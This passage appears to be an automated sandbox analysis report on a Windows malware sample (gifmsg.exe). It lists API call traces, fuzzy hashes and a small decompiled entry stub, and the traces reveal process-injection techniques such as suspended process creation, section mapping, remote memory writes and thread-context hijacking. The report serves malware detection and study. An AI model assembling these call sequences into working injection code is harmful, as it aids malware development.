    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

Instruction address range: 0x00401012 to 0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:5BDD37EDD3740A4E2DA2E05ABDC20A20
Total matches:34
Initial Analysis Report:Open
Initial sample Analysis ID:60136
Initial sample SHA 256:3D61067831E54523401557F16F776796142F313F41B2B12D48B017A7E06B48DD
Initial sample name:gifmsg.exe

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
